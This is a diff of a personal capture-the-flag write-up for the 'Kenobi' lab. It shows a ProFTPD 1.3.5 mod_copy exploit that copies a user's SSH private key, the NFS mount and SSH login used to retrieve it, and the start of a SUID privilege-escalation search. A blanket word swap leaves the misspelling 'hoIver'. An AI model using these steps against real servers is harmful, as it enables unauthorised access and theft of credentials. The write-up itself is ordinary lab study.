BabisSt/my-ctfs/CTF { Kenobi }.md

 *ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems.
 Its also been vulnerable in the past software versions.*

-We are going to use [[Introductory Networking#Netcat]] to connect to the port 21 with:
+I am going to use [[Introductory Networking#Netcat]] to connect to the port 21 with:
 `nc [ip] [port /21]`
-We get the version and now we search for vulnerabilites for this version with:
+I get the version and now I search for vulnerabilites for this version with:
 `searchploit ProFTPd 1.3.5`
-And we find 5 of them.
+And I find 5 of them.

 *You should have found an exploit from ProFtpd's [mod_copy module](http://www.proftpd.org/docs/contrib/mod_copy.html).
 The mod_copy module implements **SITE CPFR** and **SITE CPTO** commands, which can be used to copy files/directories from one place to another on the server.
 Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.
-We know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.
+I know that the FTP service is running as the Kenobi user (from the file on the share) and an ssh key is generated for that user.

-We are going to use those 2 commands to steal the id_rsa.
-So inside the opened connection we `SITE CPFR /home/kenobi/.ssh/id_rsa` and
+I am going to use those 2 commands to steal the id_rsa.
+So inside the opened connection I `SITE CPFR /home/kenobi/.ssh/id_rsa` and
 `SITE CPTO /var/tmp/id_rsa`

-Now we have to mount the /var folder and we do it like so:
+Now I have to mount the /var folder and I do it like so:
 ```
 mkdir /mnt/kenobiNFS
 mount [ip]:/var /mnt/kenobiNFS
 ls -la /mnt/kenobiNFS
 ```

-We now have a network mount on our deployed machine!
-We can go to /var/tmp and get the private key then login to Kenobi's account.
+I now have a network mount on our deployed machine!
+I can go to /var/tmp and get the private key then login to Kenobi's account.
-To connect to the machine we :
+To connect to the machine I :
 ```
 cp /mnt/kenobiNFS/tmp/id_rsa .
 sudo chmod 600 id_rsa
 ssh -i id_rsa kenobi@[ip]
 ```

-And we are in and get a flag!
+And I am in and get a flag!
 ## Privilege Escalation with Path Variable Manipulation

 ![](https://i.imgur.com/LN2uOCJ.png)

-SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other custom files could that have the SUID bit can lead to all sorts of issues.
+SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), hoIver other custom files could that have the SUID bit can lead to all sorts of issues.

 To search the a system for these type of files run the following:
 `find / -perm -u=s -type f 2>/dev/null`